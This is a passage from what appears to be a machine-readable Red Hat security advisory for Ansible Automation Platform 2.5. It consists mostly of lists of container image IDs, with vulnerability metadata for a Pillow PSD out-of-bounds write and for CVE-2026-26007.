"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:de9acb254c64d4b5f060867ac81c3c7b92da197bd62914705f47f81c719000f9_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:299e584db6227b51630ff777864b19113e8a1ea8100aa5c1bde092f730f35911_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:3aae092b74e73969f4328e406f804297e44130fea3232db3403db98463e42d9c_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:b77247eccd37c9bc29631142605c6fab3af9d23ebf82b43f049664e44193d377_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:f1eb81b968bdee5bbfa48e25718ac574bdda09c2acf726d9f058e0643585d59d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:009336407c386ffb1f5f1bdb7a38256e73b8b2ec97036f8ab84e7293f517ef8e_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:82e4da659d4bbf036bafee5f598602ec32b7b5f8d3d595287dcf418288bf2147_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:8ee6e0938cc2189984009da95ebd6fb4f5946cf9e1f7ef7aae8d6f40dfc7ab36_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:90d90e31d0afe833778743baf4eb3527402a65c30fdcce149ff8d4820faa3781_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:34bfde79221d2f824177f72d68a877b63bfe88b1f0562741a2dc212f83cb4e62_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c25356366526086b2e85274793b8e9dadf1a04d35515087d4421c74bb9b4bacf_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c5923a2649845cc20cdc2d015442d8007e9e0f77522d652d8af389437681c4ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:d91f808a230d11c3b998cbd703fd8fd043188164f61962b5518cda91ad19712b_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:0d79e8c5f3f36c290006c0adbe7c14f57bad10566017f005ae4073905b170136_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:57bf7919da3de08961e4c151b08dab1c756353a4040d0dd66feb72fcfe1cc8ce_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:6d0a4b9c41713e592707a1b93d48f197977bf9eb05aa5e87a083976720061cbb_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:c6d21fc02716334ab7f6c48ba7d102965d197209c5a9fd3b41a6ea65b5da0055_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:48f4971662ddb841e25bb610f72ef5f37eddf482b117786595d80d0931448236_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:6ec99dbde70c05dc5fbd64f81779f75ca8a131c0d3865f1be318a4cd8152ed33_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:783723cc28521153aef6aeaee7786f8bb87e01ef738b90b8b5fb2f2b2fb6c780_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:7c13d95770002e16dbd5dc86ea82f6fc5e70828582b928d9e3388ecded90b67a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:7188e3f507cdaa346ed930c158379a67104dbdc74535a2b5a541cea60c03a123_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:85c083ae0b2493347cbf1e5885ad56335b1799e545f136118cfe597f39f3df6e_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:c5079720f6ea2ab7fb6b1acc6fa0c3c5087d91507c2fb21bb5b4ebc57953b4cf_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:f250376b2a72ff2e0bd866bbd8142c5e071218351ad62c52cd7b7a6f3baab026_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:0a10e9afd9c3d555a36db84f938973f14fb099164b1ba5068f9e5a9cfec51f01_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:1fcab1dccdd7ab7976ac0a57fad193d9411aecdc82cc24752378589978ab3c83_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:21636d382f0a42b7d87d3b1f4ee53bf73e589bb549750d279ca21f96517d7a3d_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:ac48a386cf9175fa667538475607d8d7444e2d21e77bea8ce8d3bf291c59d4a0_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:0e5a121065f55cb7381d74794dd44b02a564195bca3bdfd9d9a10905fd0995a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:3838ae2045ed11b4bfe2c86675a5bebe4f51971d30322af3721969e3e2fca06f_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a23c10d8ea852924e8c89a80cb561b2ed9dbacb13257401181b9b13ddf6786ee_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a592586194e5234cfcc2d783f876713771ac489c530205e87053a60b1dd90e04_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:268a35d7a2bb13547826ec27291d5b48b2abe1d530b49a6085fcdde9410b61f8_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:985cf2d3da53a542a87d98e4b698f53cf9b99e1a09e86b206f42c96833c2b35c_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:9cda51df51a24542cd1cd9cd4c072389340d0e678d82236d38c64568cf5d552d_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:fe9512b0361734dcaa41b19c4f02b36ec45896ff911dd44a9e821fdd60d30374_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:17c4c5a579c802fc9a4ee935ad723f65c63aa63ce3b5e4a91705c12ec59feca6_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:3b3a79cebad3f9230b476752c3a6dc29b3d5179d0a3fcf90707eaf14da11ae84_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:a28642cbd593dcdd8673c4bdac30da6eafba29e8abc4ddeaa12369177b5052c7_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:bd47ed866c9bee7c22e7fafcb959df87f64abdbea9f38603a377216f99be3b43_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:1254e449d313f5f663d056097b9cddbcd7fce91c7a6448b1d4f57c622d9556b3_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:8523ece411bf1842b9309abc7dea7067a26a0efd6cb0510449a6573df820a45c_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:bde426912de4c15616e3b71408f4760fd12172dc97ce15d5511d0094784643eb_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:c87feb6c292b8f95cc840237e3a498eaa3198447f11bb3dd652818e1128bf4a4_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:6547c593ea515750150478d442e17f113fb76ec611f6d7c2ff62223e1742a083_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:d6fe585bac62fd646127894dcb9bf55462daf60a22c8721ee44658fbdd3e99a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:e8c26f06cca6450dc68a6160a6d1ababdf0992ed9000f27dea5177b813671653_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:eab05f26b14dd06d7e4f5580a873d8bdb18317abf1e82300da089cba5129bdb4_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:049878acbb0f6297eae90180b88b011d00e954285d3197e2c19bc17e82f67523_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:6624a8e702ff2bc3f07b63a8fec42034c48b41bb187818fd4f2dd8a8f60766cb_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:b829b37753a3d14aebf4d114973f843dfc6e4706cf2375408bab8950ab15d2ff_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:c41ad877f30bc37bd9fe8422c410da12159b8fba7ab9ed0fd174e0d30a1ed125_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:47315b849e1e70f6240f310ed5b6d402f6512973bd94bb70d9138d03b790b1a8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:8b63224e8726db24bf51a5456ef9ede17299e1d920d57a66c49be8a03d3485ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:9a20dbc471286e91b2687c22b692a335b287f8eaba817c0f4b6c31b42a669b94_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:b104daa98ef64f2be52d0066ca490a98ef3380a4516038711972be8c01a16571_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:0b65799b577e98beaa59b850028bbfc2d2b112465d1661cd6ab90fb0dd296695_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:116d10699e27737b256b1ccd035c65334696553d107c1002eb85be69aec4c65a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:78bb5cce2e05156b39a961747174a819c945298fb2f444ef321de6f2bbd5ac5b_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:9b3fd70beaca874656c8e051fa6b3f04b8cbc99e61278a953832637c8c0fb18a_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:0997e7c2515f817d857c9c3dc157f7adec41553adfc3a22913bd65c90b1c9924_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:bac6445179c1c27314e958b41b3d67b1d34dcb05ac9a360a8fe297ab631d64f7_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:d55d0744741b5fcd00107cc2a443dec11696a5daa453a4d992f1e15c3f4708b2_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:dec36413a14d42948aa73339aaba4e5b22f38ddc364436c66ab9d1a8aac465b3_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1074bbb8a68b75e8c8635bc622bf059cf0ae5bf582d48af31eca9bfc4f4787e8_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1d1f1078e7a5d916a6df61d83b6c38512a4f1e6ca71d91212fd539aa3be4d8ed_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:c8fd574a2ddb034be88d78b49ae22de5fea68679c0a9f1f3e24583ef118fb532_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:f1abc733921423176ccd6bc3b31093c151b84bdfa9a82b1f640a540edbfbf358_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:0bdf70b361111ad28cc4c5a38a52fb7557a7256c45d31b9c187fba4213c1080d_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:20537bc868859605ba1a227b8ffaa4523c03b67093e71e910d8cb3b8fbe0392d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:6481c675623cee9bcabd4a1c3a04d169c46e103c944af5ef69a75fc9bd69dfb8_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:e474929fa188b73d80eee028cd51e54f07157e587071cf60109f4398ea4dce30_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:2f9ec28f18893b516b9dadcce88a8efaa908e916305f7b802f250c2283c37cb5_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:3e61238b7400447dfd7999d053e7f701d7c84d62e4a0ef29950c39f3843fb467_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:9bbe1c621a8ee4c960e945c0f1a57c89654314435ea00083abbeb390991c62bb_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-chatbot-rhel8@sha256:c3451ed3202ea6b8328f1cacd4fe0205df1fa0d3eec3a960873ec493e9d49d67_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:3cbb5b8c06d7911476e411419ff88a02126e0a6f4f514247e112afc9f939c80f_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:433143f26cf3ebbc1e6492d8e6b96a0fe82dbb46a54859e9a10fef1e5f71842d_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:c7b4a67cf4b2a1fece30e67d57c67d850d6f9866cf6fc39206b4ca09956e4deb_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8-operator@sha256:f1d3f1a1c0396fa4f3b5496af6a6d2dfc231c8d8bc453774b2c4319bfd00b96e_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:0682e9e4bc9ad2b2b564fa2fa8b022e46729b27e26ec7b14ed2f1fae3e52a0d1_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:2f25f26750ceac18fd9c059eb3f11cc400dc0160d9ca78eded86af360c81d201_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:360d270a9167d79e297b050093209bcc9e0d854045b9ba116192073ce44c662c_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/lightspeed-rhel8@sha256:7d75c8ac498141ba26b4a927dbc4b4426a566da5ba09d4e0017fbf715bd05b27_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:7686b10f4f4091c5e56ce58c6c12f6cff0b7d5fd526fd606e92abf75eb6b13c2_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:c20cc51275c70431b1e730ca48a82942c5385bba90aeb514e01fd3e142c158d0_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:df33172c1cb33952183c80ab0f86c5f414a5103b9eb0757f744103678a6992ff_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:e0c6a368dc6da0906c102aa3587b297e7fe4d4072b5b019a2f3e1a0d54c8053b_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:5596feea40bd5eaf4e97a7eb33c4e7069e802fc921e1fa5fd65b7db9ff99637f_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:b4bf1128add34cd02dbb769b2445af2491cb1fe3b23d8aaecdff3044ecb889be_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:ce70350c29cfb97ebfa8f0782b6c193c1693704cc184c039329df915aeeaaaa2_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:f700beaf7b8466e958876ea71762439e9b7224f34f066a72e3454b7ab450e0cb_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:05a079835148d3cb9357e0c911ba78646748c4373b4f39cb995fc6f6a1d35315_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:43e267abfa4d52a2fb3677406ee8c7a44cb7ddecb94fe13b852546eb4a8c2b99_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:b8ad28fb112c9f076499050ed7f27e1fce701bbc9cf3c1835c113a6a0bd9e915_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:e34860aa425dc582c6e2214d5762a31e84f62d905469b3f130fc3980a03c36b1_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8a3978970e82e80c57d44ef3187049eaf58b715460442363a239bf023db64791_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:bc8fc8ba010f7e49b2c9a1b8994d6de05650f8028b2c6dbb0db3e721ed53cdef_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "pillow: Pillow: Out-of-bounds Write via Specially Crafted PSD Image"
},
{
"cve": "CVE-2026-26007",
"cwe": {
"id": "CWE-354",
"name": "Improper Validation of Integrity Check Value"
},
"discovery_date": "2026-02-10T22:01:01.036116+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:0f8839e5aee29a659fc87dbe1974d52807b02232b12bfae0a9ee75f72f6822d8_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:cbed194c572c59551a2b73e61d8c3821df77d5a9ca7d2275062c439996a24eb4_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:f501719d54fc49e168385702bb0e1d8432b65f129a56a8fe184557a715956196_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:fe250f135f03aecf8489c1cee9721b9e48549e19d5a609a3d3284fe7d758a34d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:6fd7c632b981a1b0593c6af234c4b40d1046eabebe41ce29f75e1e010e92226a_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:b8d2a7da8627fa6a020330453c9fee31ba37a8eddd2d014fafa5bf3ed838fb5e_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:c264a07ccc7020902897cc9420a76dc590431596fc74696b57e42c2cc658a3f7_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:de9acb254c64d4b5f060867ac81c3c7b92da197bd62914705f47f81c719000f9_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:299e584db6227b51630ff777864b19113e8a1ea8100aa5c1bde092f730f35911_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:3aae092b74e73969f4328e406f804297e44130fea3232db3403db98463e42d9c_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:b77247eccd37c9bc29631142605c6fab3af9d23ebf82b43f049664e44193d377_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:f1eb81b968bdee5bbfa48e25718ac574bdda09c2acf726d9f058e0643585d59d_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:009336407c386ffb1f5f1bdb7a38256e73b8b2ec97036f8ab84e7293f517ef8e_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:82e4da659d4bbf036bafee5f598602ec32b7b5f8d3d595287dcf418288bf2147_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:8ee6e0938cc2189984009da95ebd6fb4f5946cf9e1f7ef7aae8d6f40dfc7ab36_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:90d90e31d0afe833778743baf4eb3527402a65c30fdcce149ff8d4820faa3781_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:34bfde79221d2f824177f72d68a877b63bfe88b1f0562741a2dc212f83cb4e62_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c25356366526086b2e85274793b8e9dadf1a04d35515087d4421c74bb9b4bacf_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c5923a2649845cc20cdc2d015442d8007e9e0f77522d652d8af389437681c4ed_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:d91f808a230d11c3b998cbd703fd8fd043188164f61962b5518cda91ad19712b_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:0d79e8c5f3f36c290006c0adbe7c14f57bad10566017f005ae4073905b170136_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:57bf7919da3de08961e4c151b08dab1c756353a4040d0dd66feb72fcfe1cc8ce_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:6d0a4b9c41713e592707a1b93d48f197977bf9eb05aa5e87a083976720061cbb_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:c6d21fc02716334ab7f6c48ba7d102965d197209c5a9fd3b41a6ea65b5da0055_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:48f4971662ddb841e25bb610f72ef5f37eddf482b117786595d80d0931448236_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:6ec99dbde70c05dc5fbd64f81779f75ca8a131c0d3865f1be318a4cd8152ed33_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:783723cc28521153aef6aeaee7786f8bb87e01ef738b90b8b5fb2f2b2fb6c780_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:7c13d95770002e16dbd5dc86ea82f6fc5e70828582b928d9e3388ecded90b67a_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:7188e3f507cdaa346ed930c158379a67104dbdc74535a2b5a541cea60c03a123_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:85c083ae0b2493347cbf1e5885ad56335b1799e545f136118cfe597f39f3df6e_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:c5079720f6ea2ab7fb6b1acc6fa0c3c5087d91507c2fb21bb5b4ebc57953b4cf_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:f250376b2a72ff2e0bd866bbd8142c5e071218351ad62c52cd7b7a6f3baab026_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:0a10e9afd9c3d555a36db84f938973f14fb099164b1ba5068f9e5a9cfec51f01_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:1fcab1dccdd7ab7976ac0a57fad193d9411aecdc82cc24752378589978ab3c83_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:21636d382f0a42b7d87d3b1f4ee53bf73e589bb549750d279ca21f96517d7a3d_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:ac48a386cf9175fa667538475607d8d7444e2d21e77bea8ce8d3bf291c59d4a0_arm64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:0e5a121065f55cb7381d74794dd44b02a564195bca3bdfd9d9a10905fd0995a6_s390x",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:3838ae2045ed11b4bfe2c86675a5bebe4f51971d30322af3721969e3e2fca06f_amd64",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a23c10d8ea852924e8c89a80cb561b2ed9dbacb13257401181b9b13ddf6786ee_ppc64le",
"Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a592586194e5234cfcc2d783f876713771ac489c530205e87053a60b1dd90e04_arm64",
